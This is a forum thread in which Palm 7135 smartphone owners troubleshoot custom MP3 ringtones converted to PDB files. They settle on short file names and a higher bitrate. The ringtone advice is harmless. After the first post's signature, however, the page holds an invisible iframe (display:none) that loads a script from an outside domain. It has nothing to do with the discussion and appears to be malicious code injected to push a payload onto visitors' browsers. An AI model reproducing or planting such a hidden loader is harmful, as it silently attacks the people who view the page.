+ Reply to Thread

Problems activating new mp3 (.pdb) ringtones

I have searched through the postings and have been unable to find an answer here:

I am trying to install my own custom ringtones on my 7135. Per what I have read on Smartphonesource, I begin by converting my .mp3 into a .pdb file. I install the new .pdb file onto my 7135 with the Hotsync manager and then soft reset my 7135. After rebooting, I check the file manager and the new ringtone is listed with the rest of the pre-installed ringers. However when I go to phone preferences > incoming calls > ringer type and scan down for the new ringtone, it is nowhere to be found.

Anybody have an explanation for this?

Eric<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Have you checked the bottom of the list? The ringtones you add are not put in alphabetical order.

I did and they aren't there. The last listing is for "Xylophone"

I was just about to post with the same situation. Except I can't even get mine to come up on the file manager.

I turn the mp3 to wav. Then back to mp3 at a much lower, mono, bitrate. Put it through the ringer software. Sync. and it doesn't show up on the phone...

I've repeated this several times with no luck...

HELP!

You all need to make sure the file name is no more then 7 characters before the ".mp3".

I understand that with the newer firmware now shipping on the Verizon branded phones you should not need to do the soft reset after loading the tones.

Liltiki, after you run the mp3 through the software, you still need to tell the palm installer to sync the file. If I am reading your post correctly, you are missing that step....

See the FAQ: http://www.smartphonesource.com/vbul...&threadid=4845

Alan

If it is this step:
    ""Install this PDB like any other Palm application to the handset via a synchronization. After installation, reset the 7135 by pressing the reset button under the battery door. Your new ringer will be available after it boots back up. ""

Yes, I've done that. And made sure the file name is less than 7 letters. I've tried syncing with the ringtone file in the add-on palm folder and the desktop...

I've followed every step and can't figure out what's wrong.

Emeyer, Where did you find it in file manager. It's not in ringtones list in file manager...

Very frustrated...

:anger

The ringtones I upload can be found in "file manager" under MP3player.

I believe I may have solved my own problem. Has to do with the seven characters in the name of the ringtone file. When the name of the file is seven characters or left I can activate it as a ringtone. Also, I do have a Verizon 7135 and did not need to soft reset to be able to choose the ringtone.

Eric

Originally posted by liltiki
    If it is this step:
    ""Install this PDB like any other Palm application to the handset via a synchronization. After installation, reset the 7135 by pressing the reset button under the battery door. Your new ringer will be available after it boots back up. ""

Yes, I've done that. And made sure the file name is less than 7 letters. I've tried syncing with the ringtone file in the add-on palm folder and the desktop...

I've followed every step and can't figure out what's wrong.

Emeyer, Where did you find it in file manager. It's not in ringtones list in file manager...

Very frustrated...

:anger
    I can't help but thinking you are missing a step somewhere.... it doesn't matter what folder the pdb file is in, what matters is that you use the Palm install tool to set it up for syncing.

Does you sync log show that files were installed? It should be the first entry in the log.

If you are located in the DC-metro area, I would be glad to lend personal assistance, or we could set up a Netmeeting, PC Anywhere, VNC, NetOp or GoToMyPC connection and I could try to help you remotly. PM me if interested.

Alan

This is the prompt I get when I try to sync:

Invalid handheld file deleted: CalmSternTInstallHeights.mp3.pdb

SAME ISSUE

I receive the exact same error liltiki! I believe we have received our phones at the same time from GC. If anyone has any advice please post. I will try verizon tomorrow if I can not get this figured out.
    Live long and prosper...

Worked it out

Got it working. I compared my invalid file with a valid ringtone file a friend got working for me this weekend. Mine was twice as big. I had the bitrate settings really low, then raised them to 48. I encoded again. The palm accepted the file.

Whew....

T